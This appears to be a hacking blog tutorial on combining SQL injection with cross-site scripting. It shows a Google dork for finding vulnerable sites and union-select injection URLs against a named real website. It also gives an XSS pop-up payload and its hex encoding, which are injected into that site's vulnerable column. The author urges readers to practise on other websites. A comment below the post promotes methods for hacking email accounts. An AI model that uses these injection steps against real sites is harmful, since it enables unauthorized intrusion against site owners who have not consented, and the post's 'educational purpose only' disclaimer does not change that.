XSS Injection with SQL Query.

Hello and welcome, today I am going to share how to execute " Cross Site Script " with " Structure Query Language Injection" known as " XXS-SQLi ".

The rule and regulations are simple and easy. You will need a exploitable website which is need to be vulnerable to " SQL Injection " to execute the both queries...

Let's start.

I am using simple " Google Dork " "inurl:index.php?id= 
You can use as much as you can, use your brain and mix them with the parameters to get different search results every time.

I am using this website http://www.icdcprague.org for demonstration. You will need to test out it with SQL injection and I am not going to show how to do it, I have already shown it in my previous articles.

Step 1) First, We need to know the vulnerable column. I have found it so just gonna show it. 

Query == >  http://www.icdcprague.org/index.php?id=-10%27+Union+Select+1,2,3,4,5,6--+



Step 2) After executing the Union base query, It will show the Vulnerable Column of the website. 

Step 3) Now you need to ready your desired  XSS Payload and encode it into HEX Value to execute it inot the query and work with the SQL injection.

Step 4)  I am using simple Pop-up payload of XSS. 
 " <img src=x onerror=confirm(/XSS/)> " 


Step 5) The encoded hex value of our payload is 0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e "

Step 6) Now it's time to execute our query... As we know that the vulnerable column of the website. It is number 4, it's mean we need to execute the hex value in the number 4 column. So let's try out.

Query==> http://www.icdcprague.org/index.php?id=-10%27+Union+Select+1,2,3,4,5,6--+ 

Query no.2 ==> http://www.icdcprague.org/index.php?id=-10%27+Union+Select+1,2,3,0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e,5,6--+

After executing the above query, it will pop-up the dialog box as shown in the figure below.


Hope y'all like it and will learn this new type of injection, mix of XSS and SQLi. You can try different type of Payloads of XSS with this injection. Practice it on different websites and master this skill. 

In my next article I will show you some more new Injections, stay tuned till then. Keep practicing and sharing folks.

NOTE :-   "This is for educational purpose only.I will not be responsible for any harm or illegal action taken by Government agencies to you. Use it as a educational purpose. "  
XSS Injection with SQL Query. XSS Injection with SQL Query. Reviewed by Unknown on 11:40:00 Rating: 5

1 comment

  1. Top 3 Modern Way to Hack Email Account
    In terms of recent ways in which of email hacking, there are unfortunately many prospects you wish to be aware of. If you're a security enthusiast, It will truly be pretty encouraging for you to understand that there are so many other ways to work with.
    http://geekonjava.blogspot.com/2016/07/top-3-modern-way-to-hack-email-account.html

    ReplyDelete

Business

[recent]

Follow